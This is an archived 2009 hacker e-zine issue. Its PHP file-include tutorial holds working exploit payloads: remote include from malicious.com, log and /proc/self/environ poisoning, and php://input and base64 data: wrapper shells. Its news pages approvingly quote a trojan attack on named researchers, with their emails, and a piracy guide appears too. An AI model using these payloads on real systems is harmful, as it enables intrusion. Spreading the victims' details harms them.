HackThisZine (HTZ) #7

EDB-ID:

42912

CVE:

N/A




Platform:

eZine

Date:

2009-06-21


"You want a seriously righteous hack you score one of those Gibsons man. You 
know super computers they use to do physics and look for oil and stuff  ... Oh 
man Wouldn't you just love to get one of those Gibsons, baby!" 
?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!?!
################################################################################

           __-----_.                            .-------------------.
          /  \      \     o  o  o  O  O  O     (  HACK THIS ZINE #7  )
         /    |  | | \___      ._.             (     SUMMER 2009     )
        |     |----------\     | |""""""".     (   HACK THE GIBSON   )
        |     |\ bloc up /     | |        "     -___________________-
         \___/  \ homie /      | |         "   
           \     \_____/       | |          "  
            | |                | |          |
           /   \-_             | |         |'
         /      \_ "__ _       !_!--v---v--"
        /         "|  |>)      |""""""""|
       |          _|  | ._--""||        |.- -. .- .-. -.-. .... .. ... -- 
       _\_____________|_|_____||________|_

secret openssh 0day release issue - proof of concept code below - no seriously!!
################################################################################

                    Hack This Zine #7  :  Hack The Gibson
                      Summer 2009  :  staff@hackbloc.org
                      
                           table of (dis)contents:
                      ->Meta 
                         1 Letters 
                         2 News in the Briefs 
                      -->Tech 
                         3 Hacking Your GPS 
                         4 Alternative PHP Include Attacks 
                         5 Hiding from the man: Apache Obfuscation 
                         6 Sucking Signal 
                         7 Hardware Hacking 
                      -->Philotics 
                         8 Tech vs Industry 
                         9 Copwatch 2.0 
                      -->EOF 

################################################################################

but first a message from our blackhat overlords, cause if you didn't dig it 
then then you better dig it now:

  "Full-disclosure is the disclosure of exploits publicly - anywhere. The 
  security industry uses full-disclosure to profit and develop scare-tactics
  to convince people into buying their firewalls, anti-virus software, and
  auditing services.
	...
  It is our goal that, through mayhem and the destruction of all
  exploitive and detrimental communities, companies, and individuals,
  full-disclosure will be abandoned and the security industry will be 
  forced to reform.     
    ...
  This isn't like before. This time everyone and everything is getting owned.
  Signed: The Anti-sec Movement" - the latest revival of pr0j3kt m4yh3m and el8, 
  h0no, dikline, zfo, etc.

################################################################################
# 1. LETTERS                                                                   #
################################################################################

From: Rhonda 
site was down earlier eh...nice to see you back up. 
http://securityforthemasses.blogspot.com/2009/03/hackbloc-down.html 
Regards 

Yea, apparently we had some issues with our server this month, 2 tips for using 
the rm command.  Don't use it with the * operator, and don't use it while tired, 
or drunk. 

From: Wan_Hacker 
I have problem on my computer. when I put my pen drive password box pop out. how 
to settle this prob 

Try entering a password? Alternatively, you could format the drive. Or see above 
for a tutorial on the rm -rf command. 

From: Salchoman   hey, i'm from Colombia and i'd love to help you translating, 
mail me if i can help u :] 
From: salcho    Hey, it would be great to help you translating htz to spanish! 
would it be of any help? 
Hey HackBloc! I'll start translating it right over, I'll start with number 6. Is 
that all right? 

Thats great! And you don't (nor does anyone else) need to ask our 
permission to translate.  :)  We would love any translations that anyone can do! 
All translations are welcomed and very helpful for non english speakers.  Please 
if you can translate any and all issues (especially the most recent ones). We 
will appreciate it very much, we will try to send you some free issues and give 
you credit in the zine!  Plus if you can translate issues, we will send you 
future issues before we publish them, so that you can translate those if you
like!  If you make translations please send them to the hack this zine mailing 
list or to staff@hackbloc.org 

From: Wine Skeem <wannest@boiiom.com> 
This iss your penis: 8--o 
This iss your penis on drugs: 8=====O 
Any quuestions? Wine Skeem, 

First of all: Sick ascii art! Second of all: Sorry, those of us with penises 
have straight edge penises and we would appreciate it if you and your friends 
would stop peddling your dope on our bandwidth. Third of all: we would 
appreciate it if all future email regarding penises would be encrypted you can 
find out public key at http://hackbloc.org/etc/hbStaffPubkey.txt 

Subject: Can She Have Multiplle Orgasms? 
From: Glimp Cypher <saurischian@lan-ev.org> 
Do you want to be seen as a capptain of the bedroom? Do you want your woman to 
be RAVING to her friends about the great sex she has while all of them get 
normal boring sex? Well if you do, then you deffinitely need to ... 
Glimp Cypher, 

We don't want to be captain of the bedroom, maybe more something like 
"Caaaaaaptain Caveman!"  What's all this sex stuff, we don't have sex, we work
on our sick monitor tans.  PS, please don't tell me you took any of that shit
that Wine skeem was pushing.  Your penis is going to turn into some ascii art 
matching the regular expression /8=+0/


################################################################################
# 2. NEWS IN THE BRIEFS!                                                       #
################################################################################

US Federal Prisons start rolling out TRULINCS email system
------------------------------------------------------------
Select federal prisons have been trying out heavily restrictive computer systems 
allowing prisoners to correspond via email. The system charges by the minute, 
strips all html/attachments. The BOP expects the system to be available in all 
federal prisons by June 2011.

The BOP website provides some information about TRULINCS. Not surprisingly, they 
confirm all communications are monitored, which is possibly the whole purpose of 
the program (physical mail is difficult and inefficient to monitor and store 
into searchable databases).

Inmates must initiate communication and get approval of both the receiver and 
prison staff (similar to visitor lists). Emails originate from <register 
number>@inmatemessage.com.

http://www.bop.gov/inmate_programs/trulincs_faq.jsp

p2pnet Wins Free Speech Supreme Court Case in Canada
----------------------------------------------------
In 2006 and 2007, former Green Party organizer and Vancouver businessmen Wayne 
Crookes has filed lawsuits against several websites including Google and 
Wikimedia alleging that they had 'published' defamatory content. Also charged 
was p2pnet who had been accused of simply linking to several defamatory 
websites.

In a October 27, 2008 decision, Judge Stephen Kelleher threw out the case, 
stating "Although a hyperlink provides immediate access to material published on 
another website, this does not amount to republication of the content on the 
originating site. This is especially so as a reader may or may not follow the 
hyperlinks provided."

http://www.p2pnet.net/story/17398
http://torrentfreak.com/p2pnet-wins-landmark-hyperlink-case-081029/

Facebook terms and services agreement
-------------------------------------
Facebook's Terms of Use "grants Facebook an irrevocable, perpetual, 
non-exclusive, transferable, fully paid, worldwide license (with the right to 
sublicense) to (a) use, copy, publish, stream, store, retain, publicly perform 
or display, transmit, scan, reformat, modify, edit, frame, translate, excerpt, 
adapt, create derivative works and distribute" etc etc.

For a brief period of time, Facebook changed it's TOS to allow them to use all 
your information after you remove your sign up information; they were forced to 
revert to the old TOS because of a public backlash. Of course, you cannot trust 
any information you put online, especially to a major corporation such as 
Facebook. 

People who are concerned about privacy and security should consider using 
Riseup's Crabgrass social networking system at http://we.riseup.net

Cuba Claims US Gov Backdoors in Windows, Develops Custom Linux Variant
-----------------------------------------------------------------------------
The majority of computer systems in Cuba are running Windows; the government 
hopes to change this by developing and releasing their own customized version of 
Linux called 'Nova' (which appears to be a customized version of Gentoo). 
Amongst it's reasons for transitioning to Linux they claim that US Government 
agencies may have access to backdoors built into Microsoft code and that it is 
difficult to obtain legal Windows copies because of the US Trade embargo.

"I would like to think that in five years our country will have more than 50 
percent migrated," dean of the School of Free Software Hector Rodriguez stated.

http://techdirt.com/articles/20090212/1347183753.shtml

Labor Report: "Dehumanization of Young Workers Producing our Computer Keyboards"
-------------------------------------------------------------------------------
An undercover investigation has revealed atrocious working conditions in the 
Meitai factory in southern China, which mass produces keyboards for american 
corporations such as IBM, Microsoft, Dell, HP, and Lenovo. The report is very 
comprehensive and includes pictures from within the facility. Here is an 
excerpt:

* The workers are paid 1/50th of a cent for each operation.
* The assembly line never stops, and workers needing to use the bathroom must 
learn to hold it until there is a break.
* All overtime is mandatory, with 12-hour shifts seven days a week and an 
average of two days off a month.  A worker daring to take a Sunday off—which is 
supposedly their weekly holiday—will be docked 2 % days' wages.  Including 
unpaid overtime, workers are at the factory up to 87 hours a week.  On average, 
they are at the factory 81 hours a week, while toiling 74 hours, including 34 
hours of overtime, which exceeds China's legal limit by 318 percent!
* The workers are paid a base wage of 64 cents an hour, which does not even come 
close to meeting subsistence level needs.  After deductions for primitive room 
and board, the workers' take-home wage drops to just 41 cents an hour.  A worker 
toiling 75 hours a week will earn a take-home wage of $57.19, or 76 cents an 
hour including overtime and bonuses.  The workers are routinely cheated of 14 to 
19 percent of the wages legally due them.
* Ten to twelve workers share each crowded dorm room, sleeping on narrow metal 
bunk beds that line the walls.  They drape old sheets over their cubicle 
openings for privacy.  In the winter, workers have to walk down several flights 
of stairs to fetch hot water in a small plastic bucket, which they carry back to 
their rooms to take a sponge bath.  In the summer, dorm temperatures reach into 
the high 90s.
* Workers are locked in the factory compound four days a week and are prohibited 
from even taking a walk.
* To symbolize their "improving lives" the workers are served a special treat on 
Fridays—a small chicken leg and foot.  For breakfast, they are given watery rice 
gruel.  The workers say the food has a bad taste and is "hard to swallow."
* Illegally, workers are not inscribed in the mandatory work injury and health 
insurance and Social Security maternity leave program.  In the Molding 
department, due to the excessive heat, the workers suffer skin rashes on their 
faces and arms.
* One worker summed up the general feeling in the factory:  "I feel like I am 
serving a prison sentence."

Read the Full Report:   http://www.nlcnet.org/article.php?id=613

http://www.nlcnet.org/admin/media/images/China/2009%20meitai%20factory/images/
workers%20inserting%20keys.jpg
[caption: chinese sweatshop producing keyboards for american corporations]

http://www.nlcnet.org/admin/media/images/China/2009%20meitai%20factory/images/
lunch%20line%20from%20back.jpg
[picture: workers in uniform line up for watery rice gruel breakfast]

Corporate Contact Information:

Lenovo / U.S. Office
1009 Think Place / Morrisville, North Carolina 27560    /  Phone: 866-968-4465        
President and CEO: Mr. William J. Amelio    Director of the Board: Yang Yuanqing

Hewlett-Packard Company
3000 Hanover Street / Palo Alto, CA 94304-1112 / 650-857-1501 / Fax 650-857-5518

International Business Machines Corp.
1 New Orchard Road / Armonk, NY 10504-1722  / 914-499-1900 / Fax: 914-765-7382
E-mail: sam at us.ibm.com (CEO Samuel Palmisano's e-mail address)

Dell Inc.
One Dell Way / Round Rock, TX 78682 / Phone: 512-728-4100 / Fax: 512-238-2773

Microsoft Corporation
One Microsoft Way / Redmund, WA 98052-6399 / 425-882-8080 / Fax: 425-936-7329

Recent Hacktivist Actions:
--------------------------

Hackers Against Oppression launch electronic civil disobedience actions in 
solidarity with Greece Riots
--------------------------------------------------------------------------------

While the streets of Greece went up in flames in protest of the police murder of 
anarchist youth Alexandros Grigoropoulos, a group of hackers calling themselves 
Hackers Against Oppression have organized an electronic civil disobedience 
action releasing sit-in scripts attacking Greek government websites. Here is an 
excerpt from their communique:

  "Hackers Against Oppression have called for Electronic Civil Disobedience in 
  Solidarity with Greek Anarchists on Wednesday Dec 31, the final day of 
  December. December is the month in which Alexandros Grigoropoulos, a
  15-year-old Anarchist, was murdered in cold blood by Greek Police. It is also
  the month that will forever be remembered by all those who struggle. Minutes
  after his murder, thousands of Greek residents took to the streets as did
  thousands around the world. Even liberal groups have called for the
  resignation of the Greek government. The streets were taken back for the
  people, police buildings were firebombed, and banks were turned into empty
  charred-out boxes. This entire time, the Greek government has been fighting
  and oppressing people with guns, tear gas, and the media. It's time that we
  take them down."

  "We will be attacking the websites of the Greek Police and the Prime Minister. 
  They are directly responsible and we will directly respond. They will no
  longer be able to spread their lies to the media about what is going on in the
  streets. You can either load the file on the day of the action or download it
  ahead of time. We suggest downloading it ahead of time in the event that our
  site get shut down."

Hackers for Total Liberation launches campaign against Huntington Life Science
--------------------------------------------------------------------------------

A group calling itself Hackers for Total Liberation has started several actions 
against the notorious Huntington Life Science corporation which is guilty of 
torturing and abusing animals. Amongst their actions they have attempted to 
infect research computer systems within Berkeley with a destructive virus as 
well as launch an electronic sit-in against HLS websites. Here are some excerpts 
from the communiques they have released:

  "Monday, January 26, you are invited to join us on an Electronic Sit In
  against HLS collaborators. We will be targeting the website of HLS's
  auditors RMSBG and since on the 26th it is the day of action against HLS
  customer, Bayer, we are targeting the website of one of their biggest
  products, aspirin.com."

  "UC Berkeley vivisector Ralph Freeman and all of the current lab members
  in Freeman's Visual Neuroscience Lab (http://neurovision.berkeley.edu)
  were sent a trojan horse virus embedded into email. This virus is
  designed to completely wreck their computers while leeching all vital
  personal information they've ever entered into their systems."

  "In addition to Freeman (freeman@neurovision.berkeley.edu), we sent the
  virus to Brian Pasley (bpasley@socrates.berkeley.edu), Thang Duong
  (thangd@uclink.berkeley.edu), Elena Allen (eadelle@uclink.berkeley.edu),
  Nina Yang (ninay@neurovision.berkeley.edu), Lars Eric Holm
  (larseric@neurovision.berkeley.edu), BaoWang Li
  (libaowang@neurovision.berkeley.edu), and Ahalya Viswanathan
  (ahalya_v@uclink.berkeley.edu)"

  "It is time to buy new computers, and after that, save yourself the hassle
  that will follow and get the fuck out of this cat killing lab. The lab where
  kittens as young as six weeks live in daily fear and trauma from the violence
  that you are responsible for. The cats in stereotaxic devices with holes
  drilled into their skulls are what drives us and we will do anything to end
  your torture."

  "This action is dedicated to all those fighting for primate freedom at UCLA
  and all those who have taken action as of late against the animal murder
  industries in Central and South America. It is for the billions of animals
  currently enslaved."

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
     we're not bitter ...   and neither is our coffee!  RNC 8 special blend

All proceeds go to the RNC 8. 1/2 lb bags of fair trade, medium roast, whole 
bean coffee available for $10 USD  (shipping included).  Place your order now by 
contacting ----- darkhartroastery@gmail.com -----
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

################################################################################
# 3. Hacking your GPS Personal Navigation Assistant                by KuroiShi #
################################################################################

DISCLAIMER: You can permanently break your GPS by doing this.   I haven't yet, 
but I'm sure it's possible.   I've heard of people bricking their GPS unit just 
by running 3rd party WinCE software on it.   Don't say you were not warned.

I recently got a PNA unit for my Chicago alley mapping project and learned some 
useful things about inexpensive touch screen devices on the market today.   
First off, most devices sold today are just locked down WinCE devices with low 
memory, no keyboard, GPS chipset and touchscreen.   Many include SD cards and 
USB interfaces and are easy to hack and install third party software on.   GPS 
hardware is cheap, and when you buy an expensive unit, your paying for the fancy 
navigation software and map updates it comes with.   Many of the expensive units 
run on the same hardware as ones you can pick up for $60-$80 bucks on sale.
I did all my work on the Holux GPSMile 52+, running WinCE 5.0.   From what I've 
gathered, it seems most PNA's these days run on the same or similar hardware.   
Mine uses a Samsung S3C2440A 400mhz ARM processor, with the SirfStar III GPS 
chipset, 32Mb NAND flash + 64Mb SDRAM internally, plus an SD slot for mapping 
software.   It has a 3.5" (320x240 resolution) screen, which is important, 
because some of the software I run is made for 480x272, and you need to modify 
it so it fits on your screen.   GPS units similar to mine that might find this 
guide useful are:

Mio c310x, c320, c520, c710, c220, c620 and c720.
Magellan devices
Navigon devices
Pretty much anything with SirfStarIII, an ARM processor and Windows CE 4. or 5.0
As always, your mileage may vary.

Devices that WON'T unlock this way are:
TomTom devices
Garmin devices
(Both of these devices run a version of linux, and while i'd love to hack around 
with one of them, I don't have one!)

My GPS comes with a shitty little shell that launches on boot from the internal 
flash memory, it's called setup.exe, and I don't fuck with it because I think it 
launches some critical functions on boot.   If the SD card is inserted in the 
slot, it autoruns the GPS navigation software, called "Holuxnavi.exe", and if no 
SD card is present you just sit in the shell where you can select GPS, Pictures, 
Music, or change some rudimentary options.   It's easy enough to break out of 
this by naming whatever you want to run on boot to Holuxnavi.exe (or your 
respective auto-launching exe, for your device)   This brings us to;

Breaking out of your shell and into WindowsCE.

Now, I'm not sure why you'd want to use Windows CE over a functional and much 
prettier shell, but it does let you run software other than what your unit came 
with so lets get to it. You'll probably first want to replace your Holuxnavi.exe 
(or C310Auto.exe or whatever your GPS device starts at boot time, shouldn't be 
too difficult to find) with a basic winCE shell called "ceDesktop.exe"   this 
will let you explore the files on your device and get a feel for things.   You 
can get ceDesktop and many other useful tools for this tutorial on 
gpspassion.com, gpsunderground.com and ppcwarez.org.   (these are forums, most 
of the software is hosted on rapidshare.com and similar sites.)   Now once you 
rename ceDesktop to replace your navigation software we can explore around a 
bit, see what minimal DLLs are required to run your device unmodded, etc.   Now 
would probably be a good time to backup your unit using Microsoft ActiveSync.   
I also recommend putting the SD card that comes with the unit in a safe place, 
and making a new one from the CD or SD card that came with your unit.   Now we 
should have access to the CE filesystem and a few basic things (like Control 
Panel)   Now we get to add some fun software.

Making your PNA environment more useful.

Now you have ceDesktop.exe running on boot, but theres still nothing but control 
panel and some shitty navigation software with maps from 2001.   I used some of 
the tools provided with the C310Auto.zip Mio C310 unlock package on 
GPSPassion.com to add some basic tools and get a regular desktop.   If you use 
this script you'll probably want to change the C310Auto.c31 script around, it 
makes some minor registry edits and copies some software to your internal 
memory.   Also, you need to change the .c31 file to reflect the name of your 
executable, (I.E. I rename my C310Auto.exe and .c31 to Holuxnavi.exe and 
Holuxnavi.c31 respectively, then I add a line in the .c31 script file to run 
ceDesktop after it does it's thing.)

C310Auto comes with some other stuff too, in the \SDMMC\Programs\Utils directory 
you'll find some useful tools for adding more software to your PNA.   It has a 
taskmanager (which I use to kill start.exe to drop to the CE desktop)   a 
Registry editor, On screen keyboard, a more fully featured filemanager than 
ceDesktop, and some status monitoring tools.   Surf around and find some more 
useful PocketPC apps to run and set up your environment any way you please.   
One thing you might want to do is make sure you do everything on the SD card and 
leave the internal memory on your unit alone as much as possible.   Another 
useful hint is to use Dependency Walker on a windows machine to open up your CE 
executables and check for DLL dependencies.   It's a pain in the ass in this 
minimal environment to get software running.

Installing 3rd party navigation software.

My unit came with Smart2Go which is some REALLY REALLY basic (read shitty) 
navigation software.   I never really tried using it for navigation, I've read 
about it telling people to take random turns off the street into buildings, 
random dangerous U-turns and just generally bad navigation and getting you lost.   
Plus the maps were so out of date that roads have been moved since it came out.   
I downloaded iGo 2008 off of Pirate Bay and used that to replace my navigation 
software.   Once again I had headaches finding all the DLLs I needed to make the 
installer run.   Dependency Walker was again, a life saver.   Some other popular 
software people run for navigation is MioMap, Finean, Destinator, PolNav, 
Route66, TomTom (Older versions, pre linux), Garmin (Same as TomTom, need to run 
older version)   I suggest you just try them out.   A good place to find this 
stuff is ppcwarez.org, gpsunderground.com, and thepiratebay.org.   
GPSPassion.com is an excellent resource for figuring out how to configure your 
unit, but they have taken a decidedly negative stance towards running pirated 
software on your GPS unit.   Also, if you find your unit crashing a lot during 
large file transfers and software installs, try turning up your virtual memory 
settings in the control panel.

Installing PDA software on your PNA.

Now hopefully everything has gone well and you have unlocked your WinCE, and 
installed some useful navigation software and some system tools.   Now what 
about playing DOOM and having contacts stored and a tip calculator and all that 
fun stuff?   I can't really recommend this software without saying first that 
I've read on forums of people using applications like this and it throwing off 
the touchscreen calibration to the point where the device is useless.   Again 
I'll repeat "THIS CAN BRICK YOUR GPS DEVICE AND MAKE IT USELESS!"   The problems 
I have heard were with the GAPI graphics library crashing and then the 
touchscreen never works again.   I haven't had any problems, but you can't say I 
didn't warn you.     MioPocket is a suite of free software distributed online 
that turns your PNA into a PDA.   It was written for the Mio PNA's, but it runs 
fine on my Holux unit.   It has some useful shareware navigation software such 
as BeeLineGPS that I like for geocaching and for mapping my tracks in google 
maps. (For my aforementioned Chicago Alley Mapping Project)   MioPocket also has 
a bunch of shareware/freeware PDA software such as Microsoft Office document 
viewers, calculators, games, etc. etc.   It has a few skins, all pretty, if you 
think Vista is pretty.   MioPocket runs at 480x272 by default, so if you have a 
smaller unit like mine, you'll need to choose one of the 320x240 skins.   While 
it's pretty and fun to fuck around with, I don't trust MioPocket one bit, and 
only run it occasionally.   I built my own interface using some of the tools 
from the C310Auto package, some of the tools from MioPocket, and running a copy 
of iGo 8, It seems to run way more stable than MioPocket, and I don't have to 
worry about accidentally bricking my GPS with a crash.   MioPocket is hosted on 
Rapidshare, you can get a link to the latest version on the GPSPassion.com 
forums.

Useful resources.

I thought I'd just give you a run down of the resources I found most useful in 
hacking my GPS device.

GPSPassion.com - The most useful resource, GPS Enthusiasts from all over the 
world post useful information here.   They don't like discussion about running 
illegal software on your PNA.

gpsunderground.com - This site mostly just references to GPSPassion, but theres 
still some good info here, plus they aren't strict about talking about running 
pirated software.

ppcwarez.org - Links to pirated PocketPC software.   They have a whole GPS 
section with maps and nav software.

thepiratebay.org - Lots more current maps and nav software.   ppcwarez is 
missing a lot of US maps and such, plus rapidshare is a bitch.

dependencywalker.com - Find out what DLLs your CE software depends on. (Sorry, 
windows only.)

microsoft.com - ActiveSync for syncing files with your PNA.   Linux users can 
just use an SD card or theres several linux alternatives to ActiveSync.


################################################################################
# 4. Alternative PHP Include Vulnerability Techniques             by Anonymous #
################################################################################

One of the fundamental mistakes made by PHP developers is to improperly sanitize 
variables before being passed to system functions - particularly include() and 
require(). This common mistake leads to what is known as Remote File Include and 
Local File Include type vulnerabilities. In the past few years PHP itself has 
started to ship with default configuration settings to try to neutralize or 
limit the effects of such vulnerabilities. But even with simple local file 
includes, there are newer techniques to exploit these vulnerabilities that lead 
to remote command execution.

Introduction to PHP include vulnerabilities
--------
The point of file include type vulnerabilities is to figure out a way to include 
a file with your malicious PHP code in it. 

<?php   include($_GET['content']);   ?>
http://asdf/index.php?content=/etc/passwd
http://asdf/index.php?content=http://malicious.com/exec.php

The first example will include the local file /etc/passwd. The second example 
will attempt to retrieve exec.php from malicious.com. This remote include is 
turned off by the default allow_url_fopen PHP setting in most situations.

The vulnerable PHP code might be a little more restrictive than the above 
example. By prepending the include with a directory they prevent remote file 
includes(http://) and by appending a file extension they can attempt to restrict 
which types of files can be included. 

<?php include("pages/" . $_GET['content'] . ".php"); ?>
http://asdf/index.php?content=../../../etc/passwd%00

The use of ../ allow directory transversal style manipulations and lets you 
navigate outside of the prepended directory in the code. If the PHP setting 
open_basedir is on, it will prevent you from navigating around too much. The web 
developer might also use some sort of sanitation function to strip malicious 
characters out of user input, but this is not always the case.

The null byte character (%00 \0) terminates the string and cuts off whatever 
comes after it, but this is also escaped when magic_quotes_gpc is turned 
on(default). There are techniques published in the paper "PHP filesystem attack 
vectors" at http://ush.it that provide possible ways to get around sanitation of 
null byte characters.

The PHP script may also depend on such variables as $_GLOBAL[] or $_SERVER[] 
such as the recently discovered phplist vulnerability (patched in 2.10.9): 
http://asdf/phplist/admin/?_SERVER[ConfigFile]=/etc/passwd

Local File Include to Remote Code Execution
----
Once you find a local file include vulnerability, you need to find a way to 
insert your malicious PHP code into a file on the server. A number of techniques 
have appeared over the past few years:

One technique is to inject PHP code in server logs to be later included via the 
above include vulnerabilities. It is possible to make a HTTP request inserting 
our code into the headers and then including apache's access_log (It may take 
some experimentation to find the correct directory for access_log). Consider the 
following example which works on a Mac OS X default apache/php configuration 
(writing scripts to send requests may be necessary because the browser will 
escape certain characters) :

<?php  
$a = fsockopen("localhost", 80);
fwrite($a, 
"GET /<?php passthru(\$_GET['cmd']); ?> HTTP/1.1\r\n" . 
"Host: localhost\r\n" . 
"Connection: Close\r\n\r\n" );
fclose($a);
?>

http://localhost/index.php?content=/var/log/httpd/access_log&cmd=id

Another method is including /proc/self/environ which contains the environment 
variables for the  apache/php process. If we were to insert malicious code into 
the User-Agent header, this code appears in that file, and so remote command 
execution is possible (provided /proc/self/environ is readable by the web 
server).

<?php  
$a = fsockopen("localhost", 80);
fwrite($a, 
"GET /../../../../proc/self/environ HTTP/1.1\r\n" . 
"User-Agent: <?php passthru(\$_GET['cmd']); ?> \r\n" . 
"Host: localhost\r\n" . 
"Connection: Close\r\n\r\n" );
fclose($a);
?>

PHP wrapper include vulnerabilities
--------
Another way of exploiting PHP include functions are utilizing php:// wrappers 
(http://www.php.net/wrappers.php). This example will utilize php://input which 
takes raw data from an HTTP POST request and executes it:

Vulnerable code:
<?php include($_GET['content']); ?>

Our request: 
<?php
$request = "<?php passthru('id;');?> ";
$req = "POST /index.php?content=php://input HTTP/1.1\r\n" .
"Host: localhost\r\n" .
"Content-type: text/html\r\n" .
"Content-length: " . strlen($request) . "\r\n" .
"Connection: Close\r\n\r\n" .
"$request \r\n\r\n";
$a = fsockopen("10.0.2.2", 80);
fwrite($a, $req);
echo $req;
while (!feof($a)) {  echo fgets($a, 128);  }
fclose($a); ?>

Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

This sample requires both allow_url_include and allow_fopen_include to be on, in 
which case the standard remote file inclusion (http://malicious/exec.txt) is 
possible. The advantage of this method is that it does not depend on storing 
files on external servers. cr0w-at.blogspot.com mentions another technique using 
the "data:" wrapper:

index.php?content=data:,<?php system($_GET[c]); ?>?&c=dir
   Or with base64 encryption (possibly bypassing validation/sketchy logs): 
index.php?content=data:;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir

Conclusion
----
Most of these methods are nothing new and do not demonstrate flaws or 
limitations in the PHP language itself. These problems can typically be 
prevented by strong input validation, common sense coding, and some tighter 
server configurations. However it does not seem likely that many of these types 
of problems(among others, such as SQL injection) will be going away anytime 
soon. So Happy Hacking!


################################################################################
# 5. Hiding from the man: Apache IP Obfuscation                    by Flatline #
################################################################################

Recently I was considering the problem of keeping logs, obviously there are many 
reasons to keep apache logs on your server such as keeping stats, seeing who has 
been attack your website, and so on.  The problem with logs is that they can be 
a privacy hazard for your users if your server were to be seized, the police 
would be able to figure out who had been visiting your site.  I decided to come 
up with a solution to alleviate some of the privacy concerns, while still 
retaining the uniqueness of an ip address through a session so that useful 
webstats could still be gained.  What I came up with was the following script.

This script takes an ip adress and turns it into another ip address using a 
simple algorithm and the md5 hash.  This makes it so the ip addresses in your 
logs are not the users real ip addresses yet you will still be able to track the 
path a user takes through your site, since ip addresses will 
remain the same.

This script is not perfect of course, the main problem being that it is  
extremely vulnerable to a rainbow tables style attack.  The possible keyspace 
for IP's is only 255^4 leaving about 4 228 250 625 possibilities for ip's.  An 
attacker with enough time on their hands could quickly create a rainbow table 
for this script.  The problem would of course be alleviated by using ipv6 which 
has a keyspace of 3.4 * 10^38 ip addresses, making it nearly impossible for a 
rainbow tables style attack to work.  (Though by the time anyone adopts ipv6 
computing power will probably have significantly increased.)

Right now this script is only in a proof of concept stage, it lacks many 
fundamental features like error checking and the ability to parse log files, but 
if it works out I plan to make a full apache module for it.

#!/usr/bin/python
"""
anonIP  -  Anonymize ip addresses in your logs while still mantaining ip address 
integrity
Author - flatline <flatline@hackbloc.org>
Copyright - GPLv3
Version = 0.1 (2009-03-14)

"""
# This code was found on http://code.activestate.com/recipes/66517/
# The author is  Alex Martelli
import socket, struct, sys, md5
def dottedQuadToNum(ip):
  #turns an Ip address into a number, duh!
  "convert decimal dotted quad string to long integer"
  return struct.unpack('!L',socket.inet_aton(ip))[0]

def numToDottedQuad(n):
  "convert long int to dotted quad string"
  return socket.inet_ntoa(struct.pack('!L',n))
# Now starts my code

def ip2anonymous(ip):
  long = dottedQuadToNum(ip)
  m = md5.new(str(long)).hexdigest()
  newLong = int(m,16) % 4294967295 #This modulo is because socket.inet_aton 
  chokes on an int > 4294967295
  newip = numToDottedQuad(newLong)
  return newip

print ip2anonymous(sys.argv[1])


################################################################################
# 6. Sucking Signal                                                   by Sally #
################################################################################

Recently I had to set up a wifi network that is open to guest and volun¬teers at 
where I work and live. However, it needed to be set up outside the range that 
the omni antenna was already broadcasting. So what I did was purchase a 
directional antenna to "suck" the signal from the omni antenna and bring it 
through a bridged router and out through a regular router to the guest and 
volunteers further up the property. With the help of a couple of IT consultants 
and a Linksys router with DD-WRT firmware, this was made possible and I'll tell 
you how. 

EQUIPMENT 
•2.4 GHz 24 dBi High Performance Die Cast Reflector Grid Wireless LAN Antenna 
(Directional Antenna)
•HyperAmp® AP 1 Watt 2.4 GHz 802.11g (b/g) Compatible Outdoor Bi- Directional 
WiFi Amplifier with Active Power Control 
•N-Male to N-Male: 400-Series Cable 30 feet 
•N-Female to N-Female Bulkhead 0-6 GHz Lightning Surge Protector 
•N-Male to N-Male: 400-Series Cable 25 feet 
•N-Male to Reverse Polarity TNC Plug: 400-Series Cable 2 feet 
•2 Linksys WRT54GL v 1.1 routers – one acting as a bridge and the other acting 
as an AP.
Note: You don't have to use the equipment I used. There's cheaper stuff out 
there. 

SET UP 
So, with the help of a co-worker and friend, we got the directional antenna on 
the roof mounted next to a fan, but far enough so the fan did not mess with 
reception. We then connected the amp to the antenna just a foot under the 
antenna on the same pole. Then we took the 30 foot n-male to n-male 400 series 
cable and connected it to the lightning protector. We put the lightning 
protector in a weather proof box and attached it to the roof. A 20 foot cooper 
wire was connected to the top of the lightning protector and then run down to 
the ground where it was attached to a ground stake and pounded into the ground 
(we have a lot of rain and thunder here, so that was needed). The 25 foot n-male 
to n-male cable was connected to other end of the lightning protector and run to 
the power injector (which comes with the amp) and is located indoors next to the 
routers. The n-male to tnc 2 foot cable was run from the power injector to the 
Linksys router that we used as a bridge.  It went where one of the short rubber 
duck antennas was located. The other Linksys WRT54G router became an Access 
Point (AP) and was connected to the bridge via a cat 5e cable.  One end of a cat 
5e cable was connected to the internet (WAN) port of the AP and the other end 
was connected to port 1 of the bridge.


FLASH FIRMWARE 

The following explains how to wipe the Linksys firmware on a router and replace 
it with DD-WRT.  For this article, you only have to flash the firmware for the 
router that will be the bridge because the Linksys firmware does not have bridge 
capabilities.

Note 1: If not followed properly, your router can be bricked. Linksys won't 
provide support when you install 3rd party firmware. We are not responsible for 
a bricked router. Do this at your own risk. 

Note 2: Do this over a wired connection. 

Note 3: Backup the router's CFE before flashing the firmware 
(http://www.dd-wrt.com/wiki/index.php/CFE_backup).  That way you can replace 
your CFE should a brick occur.

1.	Hard Reset: 30-30-30
	a.	Plug in the router.
	b.	Push in the reset button with a pen.
	c.	Hold it for 30 seconds.
	d.	Don't let go and pull the power cord out for 30 seconds.
	e.	Put the power cord back in for 30 seconds.
2.	Wait. 
3.	Flash firmware. 
	a.	Open a browser and go to 192.168.1.1.
	b.	User=Admin and Password=Admin.
	c.	Go to the Administration tab. 
	d.	Then go to Firmware Upgrade subtab.
	e.	Go here to find the proper firmware for the router you are using.
		http://www.dd-wrt.com/wiki/index.php/Supported_Devices#Linksys_.
		28all_the_rest_that_is_not_re-engineered_til_today.29
			1.	The last column tells you what to use.
	f.	Use the latest build.  ftp://dd-wrt.com/others/eko/V24_TNG/svn11296/
		i.	Version 24 service pack 2 svn11296 seems the most stable.
		ii.	For this article we downloaded dd-wrt.v24-11296_NEWD_mini.bin
